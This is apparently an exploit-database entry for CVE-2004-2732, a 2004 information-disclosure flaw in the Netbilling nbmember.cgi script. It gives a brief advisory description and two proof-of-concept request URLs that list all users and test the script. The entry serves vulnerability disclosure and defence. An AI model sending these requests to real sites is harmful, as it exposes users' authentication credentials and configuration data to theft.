[] NeoSense

Netbilling NBMEMBER Script - Information Disclosure

Author: ls
type: webapps
platform: cgi
port: 
date_added: 2004-10-22 
date_updated: 2013-03-10 
verified: 1 
codes: CVE-2004-2732;OSVDB-10902 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/11504/info

Netbilling 'nbmember.cgi' script is reported prone to an information disclosure vulnerability. This issue may allow remote attackers to gain access to user authentication credentials and potentially sensitive configuration information.

http://www.example.com/cgi-bin/nbmember.cgi?cmd=test
http://www.example.com/cgi-bin/nbmember.cgi?cmd=list_all_users&keyword=hereistheaccesskeyword